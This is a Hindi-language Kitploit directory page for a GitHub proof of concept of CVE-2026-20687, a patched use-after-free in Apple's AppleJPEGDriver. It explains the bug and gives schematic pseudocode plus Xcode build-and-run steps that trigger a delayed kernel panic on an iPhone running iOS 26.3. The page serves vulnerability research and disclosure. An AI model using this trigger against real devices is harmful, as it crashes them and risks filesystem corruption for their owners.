Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20687-AppleJPEGDriver-UAF — CVE-2026-20687: AppleJPEGDriver startDecoder टाइमआउट UAF — iOS/macOS कर्नेल भेद्यता जो विलंबित पैनिक (A19 Pro, iOS 26.3 RC) की ओर ले जाती है | Kitploit
उपकरण/GitHubGitHub/enfilade-labs/cve-2026-20687-applejpegdriver-uaf
आईओएस सुरक्षामेमोरी फोरेंसिकभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगमोबाइल सुरक्षाबाइनरी शोषण
GitHubenfilade-labs/cve-2026-20687-applejpegdriver-uaf

CVE-2026-20687-AppleJPEGDriver-UAF

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

CVE-2026-20687: AppleJPEGDriver startDecoder टाइमआउट UAF — iOS/macOS कर्नेल भेद्यता जो विलंबित पैनिक (A19 Pro, iOS 26.3 RC) की ओर ले जाती है

रिपॉजिटरी देखें
24 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-20687 — AppleJPEGDriver startDecoder टाइमआउट UAF

CVE-2026-20687 · Enfilade · enfilade.io

घटक: कर्नेल

प्रभाव: कोई ऐप अप्रत्याशित सिस्टम समाप्ति या कर्नेल मेमोरी लेखन का कारण बन सकता है।

विवरण: बेहतर मेमोरी प्रबंधन के साथ एक उपयोग-के-बाद-मुक्त (use after free) समस्या का समाधान किया गया।

— Apple सुरक्षा सामग्री, iOS 26.4 और iPadOS 26.4

लक्ष्य

iOS26.3 (23D125) (परीक्षित)
macOS—
घटकAppleJPEGDriver
पैच किया गयाiOS 26.4 / iPadOS 26.4
हार्डवेयरiPhone18,2 (iPhone 17 Pro Max, A19 Pro)

चेतावनी

PoC चलाने से डिवाइस कर्नेल-पैनिक हो जाएगा। चलाने से पहले अपना काम सहेज लें। बार-बार पैनिक होने से फाइलसिस्टम भ्रष्टाचार हो सकता है। केवल सुरक्षा अनुसंधान उद्देश्यों के लिए।

भेद्यता

startDecoder_sync में टाइमआउट पथ एक अनुरोध को मुक्त करता है लेकिन उसका एम्बेडेड क्यू-नोड पॉइंटर प्रति-कोडेक वेक्टर में छोड़ देता है। बाद में क्यू वॉक स्टेल नोड को डीरेफरेंस करता है और MTE टैग-जांच प्रवर्तन के तहत कर्नेल पैनिक हो जाता है। पैनिक आमतौर पर बाद के सिंक्रोनस JPEG डिकोड चलने तक विलंबित होता है — iPhone पर यह विश्वसनीय रूप से तब होता है जब कैमरा ऐप खोला जाता है।

प्रूफ ऑफ कॉन्सेप्ट

root@kitploit:~
// ड्राइवर को प्राइम करता है; पैनिक आमतौर पर कैमरा खोलने तक विलंबित होता है।
IOServiceOpen("AppleJPEGDriver");
for (int i = 0; i < N; i++) {
    startDecoder_async();                   // queue_io_gated: vector.push(req + 0x78)
}
IOServiceClose(conn);

// बाद में, कैमरा खोलने से ट्रिगर होता है:
startDecoder_sync();
    queue_io_gated: vector.push(req + 0x78);
    wait(10s) -> TIMEOUT;
    pool_free(req);                         // BUG: डीक्यू नहीं करता (req + 0x78)

// और बाद में (finish_io_gated):
fullSpeedRequestExist():
    node_ptr = vector[i];                   // स्टेल: node_ptr == (मुक्त req + 0x78)
    req2 = *(node_ptr + 0x8);               // UAF रीड -> MTE टैग फॉल्ट -> पैनिक

बिल्ड और रन

  1. Xcode में ios-app/Test.xcodeproj खोलें।
  2. एक भौतिक iOS डिवाइस चुनें (सिम्युलेटर ड्राइवर तक नहीं पहुंचेगा)।
  3. बिल्ड करें, चलाएं, और Panic टैप करें (ड्राइवर को प्राइम करता है और एसिंक्रोनस कार्य को क्यू करता है)।
  4. विलंबित पैनिक को ट्रिगर करने के लिए कैमरा ऐप खोलें।

लाइसेंस

LICENSE देखें।

टूल डाउनलोड करें